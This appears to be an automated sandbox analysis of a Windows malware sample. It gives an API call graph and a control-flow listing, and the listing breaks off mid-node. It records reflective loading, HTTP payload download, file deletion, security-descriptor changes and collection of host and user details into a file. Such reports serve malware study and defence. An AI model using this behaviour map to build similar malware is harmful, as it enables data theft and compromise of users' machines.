83045->83044 83046 2654194 memset 83045->83046 83046->83044 83048 26697a4 memset 83047->83048 83049 26697cf 83047->83049 83048->83049 83050 2669815 83049->83050 83056 26697ee CreateFileA 83049->83056 83051 2669846 GetProcessHeap HeapAlloc 83050->83051 83052 2669823 GetProcessHeap HeapValidate 83050->83052 83055 2669857 83051->83055 83053 2669832 GetProcessHeap HeapFree 83052->83053 83054 266983d 83052->83054 83053->83054 83054->82901 83055->82901 83056->83050 83059 266992b 83057->83059 83058 2653cf7 83070 2669880 83058->83070 83059->83058 83059->83059 83060 2669987 LocalAlloc 83059->83060 83060->83058 83061 26699a1 _snprintf FindFirstFileA LocalFree 83060->83061 83062 2669b1b FindClose 83061->83062 83068 26699d7 83061->83068 83062->83058 83063 2669b07 FindNextFileA 83063->83062 83063->83068 83064 26699f6 wsprintfA wsprintfA 83064->83068 83065 2669aa7 memset lstrcpynA 83110 2669160 83065->83110 83067 2669160 76 API calls 83067->83068 83068->83063 83068->83064 83068->83065 83068->83067 83069 2669910 76 API calls 83068->83069 83069->83068 83071 266989a 83070->83071 83072 266988b 83070->83072 83073 266989f 83071->83073 83392 2668c10 83071->83392 83072->82903 83073->82903 83075 26698b8 83076 26698c7 GetProcessHeap HeapValidate 83075->83076 83077 26698e3 GetProcessHeap HeapValidate 83075->83077 83076->83077 83078 26698d7 GetProcessHeap HeapFree 83076->83078 83079 26698f3 GetProcessHeap HeapFree 83077->83079 83080 26698ff 83077->83080 83078->83077 83079->83080 83080->82903 83561 26474a0 83081->83561 83084 264796e 83084->82880 83084->82914 83084->82916 83085 264794c GetProcessHeap HeapValidate 83085->83084 83086 2647962 GetProcessHeap HeapFree 83085->83086 83086->83084 83087 2647913 GetProcessHeap RtlAllocateHeap 83088 264793b 83087->83088 83089 264792f memset 83087->83089 83088->83085 83089->83088 83578 2646c70 memset memset RegOpenKeyExA 83090->83578 83092 2653877 83093 26538db 83092->83093 83100 26538b9 GetProcessHeap HeapValidate 83092->83100 83590 2654ab0 memset 83093->83590 83095 2653904 83096 2653927 83095->83096 83097 2654ab0 84 API calls 83095->83097 83098 26474a0 16 API calls 83096->83098 83102 26539bc 83096->83102 83097->83096 83099 265393f 83098->83099 83099->83102 83103 2653945 SetFileAttributesA DeleteFileA 83099->83103 83100->83093 83101 26538cc GetProcessHeap HeapFree 83100->83101 83101->83093 83102->82916 83104 2653966 83103->83104 83105 2653990 GetProcessHeap HeapValidate 83103->83105 83104->83105 83106 26539a5 GetProcessHeap HeapFree 83105->83106 83107 26539b0 83105->83107 83106->83107 83107->82916 83108->82891 83109->82880 83111 2669176 83110->83111 83112 2669184 83110->83112 83111->83068 83113 266918a 83112->83113 83114 2669198 lstrcpynA 83112->83114 83113->83068 83115 266923b 83114->83115 83116 26691bb 83114->83116 83115->83068 83117 2669225 83116->83117 83118 2669219 83116->83118 83120 2669236 83117->83120 83121 266922a 83117->83121 83162 2668cb0 83118->83162 83120->83115 83124 266926a 83120->83124 83260 2668d50 83121->83260 83122 2669223 83122->83115 83126 2669275 lstrcpynA lstrcpynA 83122->83126 83269 2668e30 GetLocalTime SystemTimeToFileTime FileTimeToDosDateTime 83124->83269 83128 26692b0 83126->83128 83127 26692e9 lstrcpynA 83129 266935b 83127->83129 83128->83127 83128->83128 83173 2667df0 83129->83173 83132 266945e 83134 2669478 83132->83134 83135 2669489 83132->83135 83133 266944b 83136 2668f70 2 API calls 83133->83136 83137 2668f70 2 API calls 83134->83137 83138 26694a4 83135->83138 83140 2669497 83135->83140 83141 26694a8 83135->83141 83136->83115 83139 266947d 83137->83139 83249 2668f70 83138->83249 83139->83068 83238 2668ff0 GetProcessHeap RtlAllocateHeap 83140->83238 83141->83138 83270 26690f0 10 API calls 83141->83270 83146 2669570 83148 266957c 83146->83148 83271 2668090 8 API calls 83146->83271 83147 26694ff 83255 2668bc0 83147->83255 83148->83068 83151 266953d 83151->83115 83152 2667df0 8 API calls 83151->83152 83153 266954c 83152->83153 83153->83115 83156 2668bc0 SetFilePointer 83153->83156 83154 26695c2 83155 26695d1 memcpy GetProcessHeap HeapAlloc 83154->83155 83272 2654270 GetProcessHeap HeapAlloc memset 83154->83272 83160 2669611 memset 83155->83160 83161 2669621 83155->83161 83159 266955e 83156->83159 83159->83115 83159->83154 83160->83161 83161->83068 83161->83161 83163 2668cd6 83162->83163 83164 2668ce2 CreateFileA 83162->83164 83163->83122 83165 2668cfc 83164->83165 83166 2668d08 83164->83166 83165->83122 83167 2668d50 19 API calls 83166->83167 83168 2668d0d 83167->83168 83169 2668d37 83168->83169 83170 2668d1b GetHandleInformation 83168->83170 83169->83122 83170->83169 83171 2668d2a 83170->83171 83171->83169 83172 2668d30 CloseHandle 83171->83172 83172->83169 83273 2668ab0 83173->83273 83175 2667e05 83176 2668ab0 8 API calls 83175->83176 83177 2667e16 83176->83177 83178 2668ab0 8 API calls 83177->83178 83179 2667e27 83178->83179 83180 2668ab0 8 API calls 83179->83180 83181 2667e38 83180->83181 83182 2668ab0 8 API calls 83181->83182 83183 2667e4c 83182->83183 83184 2668ab0 8 API calls 83183->83184 83185 2667e60 83184->83185 83186 2668ab0 8 API calls 83185->83186 83187 2667e74 83186->83187 83188 2668ab0 8 API calls 83187->83188 83189 2667e88 83188->83189 83190 2668ab0 8 API calls 83189->83190 83191 2667e9c 83190->83191 83192 2668ab0 8 API calls 83191->83192 83193 2667eb0 83192->83193 83194 2668ab0 8 API calls 83193->83194 83195 2667ec4 83194->83195 83196 2668ab0 8 API calls 83195->83196 83197 2667ed8 83196->83197 83198 2668ab0 8 API calls 83197->83198 83199 2667eec 83198->83199 83200 2668ab0 8 API calls 83199->83200 83201 2667f00 83200->83201 83202 2668ab0 8 API calls 83201->83202 83203 2667f14 83202->83203 83204 2668ab0 8 API calls 83203->83204 83205 2667f28 83204->83205 83206 2668ab0 8 API calls 83205->83206 83207 2667f3c 83206->83207 83208 2668ab0 8 API calls 83207->83208 83209 2667f50 83208->83209 83210 2668ab0 8 API calls 83209->83210 83211 2667f64 83210->83211 83212 2668ab0 8 API calls 83211->83212 83213 2667f78 83212->83213 83214 2668ab0 8 API calls 83213->83214 83215 2667f8c 83214->83215 83216 2668ab0 8 API calls 83215->83216 83217 2667fa0 83216->83217 83218 2668ab0 8 API calls 83217->83218 83219 2667fb4 83218->83219 83220 2668ab0 8 API calls 83219->83220 83221 2667fc8 83220->83221 83222 2668ab0 8 API calls 83221->83222 83223 2667fdc 83222->83223 83224 2668ab0 8 API calls 83223->83224 83225 2667ff0 83224->83225 83226 2668ab0 8 API calls 83225->83226 83227 2668004 83226->83227 83228 2668ab0 8 API calls 83227->83228 83229 266801a 83228->83229 83230 2668ab0 8 API calls 83229->83230 83231 266802e 83230->83231 83232 2668ab0 8 API calls 83231->83232 83233 2668044 83232->83233 83234 266805a 83233->83234 83235 2668ab0 8 API calls 83233->83235 83236 266805f 83234->83236 83237 2668ab0 8 API calls 83234->83237 83235->83234 83236->83132 83236->83133 83237->83236 83239 266902c 83238->83239 83240 2669018 memset 83238->83240 83288 2667490 83239->83288 83306 2665e80 17 API calls 83240->83306 83245 26690b4 GetProcessHeap HeapValidate 83247 26690e6 83245->83247 83248 26690db GetProcessHeap RtlFreeHeap 83245->83248 83247->83138 83248->83247 83250 2668f7a 83249->83250 83253 2668fa5 83249->83253 83251 2668f82 GetHandleInformation 83250->83251 83250->83253 83252 2668f98 83251->83252 83251->83253 83252->83253 83254 2668f9e CloseHandle 83252->83254 83253->83115 83253->83146 83253->83147 83254->83253 83256 2668bc6 83255->83256 83257 2668bd0 83255->83257 83256->83151 83258 2668bd6 83257->83258 83259 2668bf1 SetFilePointer 83257->83259 83258->83151 83259->83151 83261 2668d79 83260->83261 83263 2668e1f 83260->83263 83262 2668d82 GetFileType 83261->83262 83261->83263 83264 2668dc0 GetLocalTime SystemTimeToFileTime FileTimeToDosDateTime 83262->83264 83265 2668d8e 83262->83265 83263->83122 83264->83122 83378 2668890 GetFileType 83265->83378 83267 2668da3 83267->83263 83268 2668da7 SetFilePointer 83267->83268 83268->83122 83269->83122 83270->83138 83271->83159 83272->83155 83274 2668b84 83273->83274 83275 2668ac3 83273->83275 83276 2668bb0 83274->83276 83277 2668b8a WriteFile 83274->83277 83278 2668b62 memcpy 83275->83278 83279 2668adf CreateFileMappingA 83275->83279 83276->83175 83277->83175 83278->83175 83281 2668b03 MapViewOfFile 83279->83281 83282 2668b1f 83279->83282 83283 2668b2d memcpy UnmapViewOfFile 83281->83283 83284 2668b1a 83281->83284 83282->83175 83285 2647310 2 API calls 83283->83285 83286 2647310 2 API calls 83284->83286 83287 2668b50 83285->83287 83286->83282 83287->83278 83289 26674a2 memset 83288->83289 83291 2667528 83289->83291 83307 2668eb0 83291->83307 83292 266757c 83296 2667b00 83292->83296 83297 2667b23 83296->83297 83305 2667b2e 83296->83305 83338 26678b0 12 API calls 83297->83338 83299 2667d9f 83318 2666c00 83299->83318 83300 2667b28 83300->83245 83304 2666c00 9 API calls 83304->83305 83305->83299 83305->83304 83339 2667770 memcpy memcpy ReadFile 83305->83339 83306->83239 83311 2668ed0 83307->83311 83309 266755b 83309->83292 83310 2667770 memcpy memcpy ReadFile 83309->83310 83310->83292 83312 2668edf 83311->83312 83313 2668f1c 83311->83313 83315 2668f36 83312->83315 83316 2668ef1 memcpy 83312->83316 83314 2668f23 ReadFile 83313->83314 83313->83315 83314->83315 83315->83309 83317 2668f11 83316->83317 83317->83309 83320 2666c2d 83318->83320 83319 2666cc0 83321 2666cc6 83319->83321 83322 2666d01 83319->83322 83320->83319 83323 2666c87 83320->83323 83325 26671a0 8 API calls 83321->83325 83340 26671a0 83322->83340 83324 26671a0 8 API calls 83323->83324 83327 2666c8f 83324->83327 83328 2666ccf 83325->83328 83368 2667350 9 API calls 83327->83368 83331 2666fb0 8 API calls 83328->83331 83335 2666cbb 83331->83335 83336 2666d8c 83335->83336 83364 2667260 83335->83364 83336->83245 83338->83300 83339->83305 83341 26671af 83340->83341 83342 2666d0a 83341->83342 83369 2668a80 83341->83369 83344 2666b30 83342->83344 83345 2666b47 83344->83345 83346 26671a0 8 API calls 83345->83346 83347 2666b83 83346->83347 83348 26671a0 8 API calls 83347->83348 83349 2666b91 83348->83349 83350 26671a0 8 API calls 83349->83350 83351 2666b9c 83350->83351 83352 2666bcc 83351->83352 83354 26671a0 8 API calls 83351->83354 83374 2666900 83352->83374 83354->83351 83356 2666900 8 API calls 83357 2666bee 83356->83357 83358 2666fb0 83357->83358 83361 2666fce 83358->83361 83362 26670c9 83358->83362 83359 26671a0 8 API calls 83360 26670e2 83359->83360 83360->83335 83361->83362 83363 26671a0 8 API calls 83361->83363 83362->83359 83363->83361 83365 266726c 83364->83365 83366 2667323 83365->83366 83367 2668a80 8 API calls 83365->83367 83366->83336 83367->83366 83368->83335 83370 2668a92 83369->83370 83371 2668a8d 83369->83371 83372 2668ab0 8 API calls 83370->83372 83371->83342 83373 2668a9f 83372->83373 83373->83342 83377 2666925 83374->83377 83375 2666a55 83375->83356 83376 26671a0 8 API calls 83376->83377 83377->83375 83377->83376 83379 26688a4 83378->83379 83380 26688b1 GetFileInformationByHandle 83378->83380 83379->83267 83381 26688c0 83380->83381 83382 26688cd GetSystemTime GetLocalTime SystemTimeToFileTime SystemTimeToFileTime 83380->83382 83381->83267 83383 2668925 GetFileSize 83382->83383 83385 266898e SetFilePointer ReadFile SetFilePointer ReadFile 83383->83385 83388 2668a1d 83383->83388 83386 26689d5 83385->83386 83385->83388 83387 26689e0 SetFilePointer ReadFile 83386->83387 83386->83388 83389 2668a01 83387->83389 83390 2668a6e 83388->83390 83391 2668a4d FileTimeToDosDateTime 83388->83391 83389->83388 83390->83267 83391->83390 83393 2668c1d 83392->83393 83394 2668c23 83392->83394 83407 2669680 83393->83407 83395 2668c3d 83394->83395 83397 2668c36 UnmapViewOfFile 83394->83397 83398 2668c6e 83395->83398 83399 2668c4b GetHandleInformation 83395->83399 83397->83395 83401 2668ca6 83398->83401 83402 2668c79 GetHandleInformation 83398->83402 83399->83398 83400 2668c61 83399->83400 83400->83398 83403 2668c67 CloseHandle 83400->83403 83401->83075 83404 2668c8b 83402->83404 83405 2668c98 83402->83405 83403->83398 83404->83405 83406 2668c91 CloseHandle 83404->83406 83405->83075 83406->83405 83408 26696a8 83407->83408 83416 2669734 83407->83416 83410 2669707 GetProcessHeap HeapValidate 83408->83410 83411 26696e3 GetProcessHeap HeapValidate 83408->83411 83408->83416 83417 26681d0 83408->83417 83410->83408 83414 266971d GetProcessHeap HeapFree 83410->83414 83411->83410 83413 26696f7 GetProcessHeap HeapFree 83411->83413 83413->83410 83414->83408 83415 2669754 83415->83394 83416->83415 83516 26685d0 83416->83516 83418 2668ab0 8 API calls 83417->83418 83419 26681e5 83418->83419 83420 2668ab0 8 API calls 83419->83420 83421 26681f6 83420->83421 83422 2668ab0 8 API calls 83421->83422 83423 2668207 83422->83423 83424 2668ab0 8 API calls 83423->83424 83425 2668218 83424->83425 83426 2668ab0 8 API calls 83425->83426 83427 266822b 83426->83427 83428 2668ab0 8 API calls 83427->83428 83429 266823f 83428->83429 83430 2668ab0 8 API calls 83429->83430 83431 2668253 83430->83431 83432 2668ab0 8 API calls 83431->83432 83433 2668267 83432->83433 83434 2668ab0 8 API calls 83433->83434 83435 266827b 83434->83435 83436 2668ab0 8 API calls 83435->83436 83437 266828f 83436->83437 83438 2668ab0 8 API calls 83437->83438 83439 26682a3 83438->83439 83440 2668ab0 8 API calls 83439->83440 83441 26682b7 83440->83441 83442 2668ab0 8 API calls 83441->83442 83443 26682cb 83442->83443 83444 2668ab0 8 API calls 83443->83444 83445 26682df 83444->83445 83446 2668ab0 8 API calls 83445->83446 83447 26682f3 83446->83447 83448 2668ab0 8 API calls 83447->83448 83449 2668307 83448->83449 83450 2668ab0 8 API calls 83449->83450 83451 266831b 83450->83451 83452 2668ab0 8 API calls 83451->83452 83453 266832f 83452->83453 83454 2668ab0 8 API calls 83453->83454 83455 2668343 83454->83455 83456 2668ab0 8 API calls 83455->83456 83457 2668357 83456->83457 83458 2668ab0 8 API calls 83457->83458 83459 266836b 83458->83459 83460 2668ab0 8 API calls 83459->83460 83461 266837f 83460->83461 83462 2668ab0 8 API calls 83461->83462 83463 2668393 83462->83463 83464 2668ab0 8 API calls 83463->83464 83465 26683a7 83464->83465 83466 2668ab0 8 API calls 83465->83466 83467 26683bb 83466->83467 83468 2668ab0 8 API calls 83467->83468 83469 26683cf 83468->83469 83470 2668ab0 8 API calls 83469->83470 83471 26683e3 83470->83471 83472 2668ab0 8 API calls 83471->83472 83473 26683f7 83472->83473 83474 2668ab0 8 API calls 83473->83474 83475 266840b 83474->83475 83476 2668ab0 8 API calls 83475->83476 83477 2668421 83476->83477 83478 2668ab0 8 API calls 83477->83478 83479 2668435 83478->83479 83480 2668ab0 8 API calls 83479->83480 83481 266844b 83480->83481 83482 2668ab0 8 API calls 83481->83482 83483 266845f 83482->83483 83484 2668ab0 8 API calls 83483->83484 83485 2668475 83484->83485 83486 2668ab0 8 API calls 83485->83486 83487 2668489 83486->83487 83488 2668ab0 8 API calls 83487->83488 83489 266849d 83488->83489 83490 2668ab0 8 API calls 83489->83490 83491 26684b1 83490->83491 83492 2668ab0 8 API calls 83491->83492 83493 26684c5 83492->83493 83494 2668ab0 8 API calls 83493->83494 83495 26684d9 83494->83495 83496 2668ab0 8 API calls 83495->83496 83497 26684ed 83496->83497 83498 2668ab0 8 API calls 83497->83498 83499 2668501 83498->83499 83500 2668ab0 8 API calls 83499->83500 83501 2668515 83500->83501 83502 2668ab0 8 API calls 83501->83502 83503 2668529 83502->83503 83504 2668ab0 8 API calls 83503->83504 83505 266853d 83504->83505 83506 2668ab0 8 API calls 83505->83506 83507 2668551 83506->83507 83508 2668ab0 8 API calls 83507->83508 83509 2668565 83508->83509 83510 266857b 83509->83510 83511 2668ab0 8 API calls 83509->83511 83512 26685b1 83510->83512 83513 2668596 83510->83513 83514 2668ab0 8 API calls 83510->83514 83511->83510 83512->83408 83513->83512 83515 2668ab0 8 API calls 83513->83515 83514->83513 83515->83512 83517 2668ab0 8 API calls 83516->83517 83518 26685e9 83517->83518 83519 2668ab0 8 API calls 83518->83519 83520 26685fa 83519->83520 83521 2668ab0 8 API calls 83520->83521 83522 266860b 83521->83522 83523 2668ab0 8 API calls 83522->83523 83524 266861c 83523->83524 83525 2668ab0 8 API calls 83524->83525 83526 266862d 83525->83526 83527 2668ab0 8 API calls 83526->83527 83528 266863e 83527->83528 83529 2668ab0 8 API calls 83528->83529 83530 266864f 83529->83530 83531 2668ab0 8 API calls 83530->83531 83532 2668660 83531->83532 83533 2668ab0 8 API calls 83532->83533 83534 2668673 83533->83534 83535 2668ab0 8 API calls 83534->83535 83536 266868c 83535->83536 83537 2668ab0 8 API calls 83536->83537 83538 266869f 83537->83538 83539 2668ab0 8 API calls 83538->83539 83540 26686b2 83539->83540 83541 2668ab0 8 API calls 83540->83541 83542 26686c5 83541->83542 83543 2668ab0 8 API calls 83542->83543 83544 26686db 83543->83544 83545 2668ab0 8 API calls 83544->83545 83546 26686f1 83545->83546 83547 2668ab0 8 API calls 83546->83547 83548 2668707 83547->83548 83549 2668ab0 8 API calls 83548->83549 83550 2668717 83549->83550 83551 2668ab0 8 API calls 83550->83551 83552 266872c 83551->83552 83553 2668ab0 8 API calls 83552->83553 83554 2668741 83553->83554 83555 2668ab0 8 API calls 83554->83555 83556 2668754 83555->83556 83557 2668ab0 8 API calls 83556->83557 83558 2668765 83557->83558 83559 2668ab0 8 API calls 83558->83559 83560 2668776 83559->83560 83560->83415 83562 26474b5 CreateFileA 83561->83562 83563 26475e6 83561->83563 83562->83563 83564 26474d7 GetFileSizeEx 83562->83564 83565 26475ed IsBadWritePtr 83563->83565 83566 26475fc 83563->83566 83568 26474f5 83564->83568 83574 26475b5 83564->83574 83565->83566 83566->83084 83566->83085 83566->83087 83566->83088 83567 26475ca GetHandleInformation 83567->83563 83569 26475d9 83567->83569 83570 2647501 GetProcessHeap RtlAllocateHeap 83568->83570 83571 264752f 83568->83571 83569->83563 83572 26475df CloseHandle 83569->83572 83570->83571 83573 2647520 memset 83570->83573 83571->83574 83575 2647591 GetProcessHeap HeapValidate 83571->83575 83576 264754c SetFilePointer LockFile ReadFile UnlockFile 83571->83576 83572->83563 83573->83571 83574->83563 83574->83567 83575->83574 83577 26475a5 GetProcessHeap HeapFree 83575->83577 83576->83574 83576->83575 83577->83574 83579 2646db4 83578->83579 83580 2646ce9 RegQueryValueExA 83578->83580 83581 2646dc2 83579->83581 83582 2646dbb RegCloseKey 83579->83582 83580->83579 83586 2646d10 83580->83586 83583 2646dd5 83581->83583 83647 2646b10 memset memset RegOpenKeyExA 83581->83647 83582->83581 83583->83092 83586->83579 83587 2646d73 GetProcessHeap HeapAlloc 83586->83587 83587->83579 83588 2646d8d memset 83587->83588 83588->83579 83589 2646da1 lstrcpynA 83588->83589 83589->83579 83591 2654f75 83590->83591 83592 2654b03 83590->83592 83591->83095 83592->83591 83593 2654bb0 InternetOpenA 83592->83593 83596 2654b1e GetProcessHeap HeapAlloc 83592->83596 83597 2654b49 83592->83597 83594 2654bd3 InternetConnectA 83593->83594 83595 2654f1a 83593->83595 83594->83595 83599 2654bf2 HttpOpenRequestA 83594->83599 83603 2654f27 GetProcessHeap HeapValidate 83595->83603 83604 2654f43 83595->83604 83600 2654b46 83596->83600 83601 2654b3a memset 83596->83601 83597->83591 83598 2654b54 memcpy 83597->83598 83619 2654b70 83598->83619 83599->83595 83607 2654c2a 83599->83607 83600->83597 83601->83600 83603->83604 83608 2654f37 GetProcessHeap HeapFree 83603->83608 83605 2654f55 83604->83605 83606 2654f4f InternetCloseHandle 83604->83606 83609 2654f5c InternetCloseHandle 83605->83609 83610 2654f5f 83605->83610 83606->83605 83611 2654c4e 83607->83611 83612 2654c3b HttpAddRequestHeadersA 83607->83612 83608->83604 83609->83610 83614 2654f66 InternetCloseHandle 83610->83614 83615 2654f69 83610->83615 83613 2654c51 HttpAddRequestHeadersA 83611->83613 83612->83613 83616 2654c96 HttpSendRequestA 83613->83616 83617 2654c66 _snprintf HttpAddRequestHeadersA 83613->83617 83614->83615 83615->83095 83616->83595 83620 2654cb8 HttpQueryInfoA 83616->83620 83617->83616 83619->83593 83620->83595 83621 2654cdb 83620->83621 83621->83595 83622 2654ce8 CreateFileA 83621->83622 83622->83595 83623 2654d16 83622->83623 83624 2665930 8 API calls 83623->83624 83625 2654d1b 83624->83625 83626 2654d76 GetProcessHeap RtlAllocateHeap 83625->83626 83627 2654d1f ConvertStringSecurityDescriptorToSecurityDescriptorW 83625->83627 83628 2654d96 memset InternetReadFile 83626->83628 83629 2654e5a 83626->83629 83627->83626 83630 2654d36 GetSecurityDescriptorSacl 83627->83630 83631 2654dc5 83628->83631 83632 2654e3e GetProcessHeap HeapValidate 83628->83632 83633 2654e81 83629->83633 83634 2654e5e GetHandleInformation 83629->83634 83635 2654d57 SetNamedSecurityInfoA 83630->83635 83636 2654d6c LocalFree 83630->83636 83631->83632 83637 2654dcc 6 API calls 83631->83637 83632->83629 83638 2654e4e GetProcessHeap HeapFree 83632->83638 83640 26474a0 16 API calls 83633->83640 83634->83633 83639 2654e74 83634->83639 83635->83636 83636->83626 83637->83626 83641 2654e29 GetProcessHeap HeapFree 83637->83641 83638->83629 83639->83633 83642 2654e7a CloseHandle 83639->83642 83643 2654e91 83640->83643 83641->83626 83642->83633 83643->83595 83656 2647350 83643->83656 83645 2654efc GetProcessHeap HeapValidate 83645->83595 83646 2654f0c GetProcessHeap RtlFreeHeap 83645->83646 83646->83595 83648 2646c54 83647->83648 83649 2646b88 RegQueryValueExA 83647->83649 83650 2646c62 83648->83650 83651 2646c5b RegCloseKey 83648->83651 83649->83648 83652 2646baf 83649->83652 83650->83092 83651->83650 83652->83648 83653 2646c13 GetProcessHeap HeapAlloc 83652->83653 83653->83648 83654 2646c2d memset 83653->83654 83654->83648 83655 2646c41 lstrcpynA 83654->83655 83655->83648 83657 264748e 83656->83657 83658 264736b 83656->83658 83657->83645 83658->83657 83659 264737c CreateFileA 83658->83659 83659->83657 83660 264739e 83659->83660 83661 2665930 8 API calls 83660->83661 83662 26473a3 83661->83662 83663 26473a7 ConvertStringSecurityDescriptorToSecurityDescriptorW 83662->83663 83664 26473fe SetFilePointer LockFile WriteFile UnlockFile 83662->83664 83663->83664 83666 26473be GetSecurityDescriptorSacl 83663->83666 83665 2647449 SetEndOfFile 83664->83665 83667 2647459 83664->83667 83665->83667 83668 26473f4 LocalFree 83666->83668 83669 26473df SetNamedSecurityInfoA 83666->83669 83670 2647467 GetHandleInformation 83667->83670 83671 2647483 83667->83671 83668->83664 83669->83668 83670->83671 83672 2647476 83670->83672 83671->83645 83672->83671 83673 264747c CloseHandle 83672->83673 83673->83671 83674 26479e0 NtQuerySystemInformation 83675 2647ae9 83674->83675 83676 2647a0f GetCurrentProcessId 83674->83676 83683 2664880 OpenProcess 83676->83683 83679 2647a1e GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 83680 2647a48 lstrcmpiA 83679->83680 83681 2647a62 83679->83681 83680->83675 83680->83681 83681->83675 83682 2647a80 memset _snprintf OpenMutexA 83681->83682 83682->83681 83684 2647a1a 83683->83684 83685 26648a5 OpenProcessToken 83683->83685 83684->83679 83684->83681 83686 2664952 GetHandleInformation 83685->83686 83687 26648ba GetTokenInformation 83685->83687 83686->83684 83689 2664968 83686->83689 83688 26648d4 CharUpperA 83687->83688 83695 2664902 83687->83695 83690 26648f0 83688->83690 83689->83684 83692 266496e CloseHandle 83689->83692 83693 2664904 CharUpperA 83690->83693 83690->83695 83691 2664936 GetHandleInformation 83691->83686 83694 2664945 83691->83694 83692->83684 83693->83695 83694->83686 83696 266494b CloseHandle 83694->83696 83695->83686 83695->83691 83696->83686 83697 2451360 83739 24511d0 83697->83739 83699 245136f GetPEB 83700 2451090 GetPEB 83699->83700 83701 2451394 83700->83701 83702 2451000 GetPEB 83701->83702 83703 24513a0 83702->83703 83704 2451090 GetPEB 83703->83704 83705 24513a6 83704->83705 83706 24513bc GetPEB 83705->83706 83707 2451619 83705->83707 83709 2451090 GetPEB 83706->83709 83708 2451000 GetPEB 83707->83708 83710 2451625 83708->83710 83713 24513d8 83709->83713 83711 2451090 GetPEB 83710->83711 83712 245162b 83711->83712 83713->83707 83714 2451000 GetPEB 83713->83714 83715 245141b 83714->83715 83716 2451090 GetPEB 83715->83716 83717 2451421 83716->83717 83718 2451000 GetPEB 83717->83718 83719 2451441 83718->83719 83720 2451090 GetPEB 83719->83720 83721 2451447 VirtualAlloc 83720->83721 83721->83707 83722 2451460 83721->83722 83724 2451090 GetPEB 83722->83724 83728 2451000 GetPEB 83722->83728 83731 2451090 GetPEB 83722->83731 83734 245158c 83722->83734 83723 2451000 GetPEB 83725 24515bd 83723->83725 83724->83722 83726 2451090 GetPEB 83725->83726 83727 24515c3 83726->83727 83729 24512c0 GetPEB 83727->83729 83728->83722 83730 24515de 83729->83730 83730->83707 83733 2451000 GetPEB 83730->83733 83732 245150f LoadLibraryExA 83731->83732 83732->83722 83735 2451608 83733->83735 83734->83723 83736 2451090 GetPEB 83735->83736 83737 245160e 83736->83737 83738 26577c0 2147 API calls 83737->83738 83738->83707 83741 24511d5 83739->83741 83742 2667819 83744 2667771 83742->83744 83743 26678ab 83744->83743 83745 26677ac memcpy 83744->83745 83746 2668eb0 2 API calls 83744->83746 83745->83744 83746->83744

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 02644B00 Relevance: 325.1, APIs: 164, Strings: 21, Instructions: 1343filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 2644b00-2644c42 CreateFileA 1 2644c48-2644d79 call 26659d0 SetFilePointer LockFile WriteFile UnlockFile SetFilePointer LockFile WriteFile UnlockFile SetFilePointer LockFile WriteFile UnlockFile GetModuleFileNameA SetFilePointer LockFile WriteFile UnlockFile 0->1 2 264592a-2645930 0->2 5 2644d80-2644d85 1->5 5->5 6 2644d87-2644d93 5->6 7 2644d95-2644dd2 SetFilePointer LockFile WriteFile UnlockFile 6->7 8 2644dd8-2644e73 SetFilePointer LockFile WriteFile UnlockFile GetUserNameA SetFilePointer LockFile WriteFile UnlockFile 6->8 7->8 9 2644e76-2644e7b 8->9 9->9 10 2644e7d-2644e89 9->10 11 2644ece-2644f6f SetFilePointer LockFile WriteFile UnlockFile GetEnvironmentVariableA SetFilePointer LockFile WriteFile UnlockFile 10->11 12 2644e8b-2644ec8 SetFilePointer LockFile WriteFile UnlockFile 10->12 13 2644f72-2644f77 11->13 12->11 13->13 14 2644f79-2644f85 13->14 15 2644f87-2644fc4 SetFilePointer LockFile WriteFile UnlockFile 14->15 16 2644fca-264502e SetFilePointer LockFile WriteFile UnlockFile GetSystemDefaultLangID memset 14->16 15->16 17 2645030-264503a 16->17 18 2645044-264505a 17->18 19 264503c-2645040 17->19 20 2645060-2645069 18->20 19->17 21 2645042 19->21 22 2645070-2645075 20->22 21->20 22->22 23 2645077-2645079 22->23 24 2645085-26450cd SetFilePointer LockFile WriteFile UnlockFile 23->24 25 264507b 23->25 26 26450d0-26450d5 24->26 25->24 26->26 27 26450d7-26450e3 26->27 28 26450e5-2645122 SetFilePointer LockFile WriteFile UnlockFile 27->28 29 2645128-26451f0 SetFilePointer LockFile WriteFile UnlockFile GetDC GetDeviceCaps GetSystemMetrics * 2 _snprintf SetFilePointer LockFile WriteFile UnlockFile 27->29 28->29 30 26451f3-26451f8 29->30 30->30 31 26451fa-2645206 30->31 32 2645208-2645245 SetFilePointer LockFile WriteFile UnlockFile 31->32 33 264524b-26452f5 SetFilePointer LockFile WriteFile UnlockFile GetDateFormatA SetFilePointer LockFile WriteFile UnlockFile 31->33 32->33 34 26452f8-26452fd 33->34 34->34 35 26452ff-264530b 34->35 36 2645350-26453fd SetFilePointer LockFile WriteFile UnlockFile GetTimeFormatA SetFilePointer LockFile WriteFile UnlockFile 35->36 37 264530d-264534a SetFilePointer LockFile WriteFile UnlockFile 35->37 38 2645400-2645405 36->38 37->36 38->38 39 2645407-2645413 38->39 40 2645415-2645452 SetFilePointer LockFile WriteFile UnlockFile 39->40 41 2645458-2645553 SetFilePointer LockFile WriteFile UnlockFile GetTimeZoneInformation _snprintf SetFilePointer LockFile WriteFile UnlockFile 39->41 40->41 42 2645556-264555b 41->42 42->42 43 264555d-2645569 42->43 44 26455ae-264563a SetFilePointer LockFile WriteFile UnlockFile SetFilePointer LockFile WriteFile UnlockFile call 2644100 43->44 45 264556b-26455a8 SetFilePointer LockFile WriteFile UnlockFile 43->45 48 2645640-2645645 44->48 45->44 48->48 49 2645647-264565d call 2644100 48->49 52 26456a5-2645741 SetFilePointer LockFile WriteFile UnlockFile GetSystemWindowsDirectoryA SetFilePointer LockFile WriteFile UnlockFile 49->52 53 264565f-2645663 49->53 55 2645744-2645749 52->55 53->52 54 2645665-264569f SetFilePointer LockFile WriteFile UnlockFile 53->54 54->52 55->55 56 264574b-2645757 55->56 57 264579c-264582d SetFilePointer LockFile WriteFile UnlockFile SetFilePointer LockFile WriteFile UnlockFile IsUserAnAdmin 56->57 58 2645759-2645796 SetFilePointer LockFile WriteFile UnlockFile 56->58 59 2645834 57->59 60 264582f 57->60 58->57 61 2645837-264583c 59->61 60->59 61->61 62 264583e-2645852 IsUserAnAdmin 61->62 63 2645854 62->63 64 264585b-2645866 62->64 63->64 65 26458ae-26458fe SetFilePointer LockFile WriteFile UnlockFile call 2644900 call 2644180 call 26444d0 call 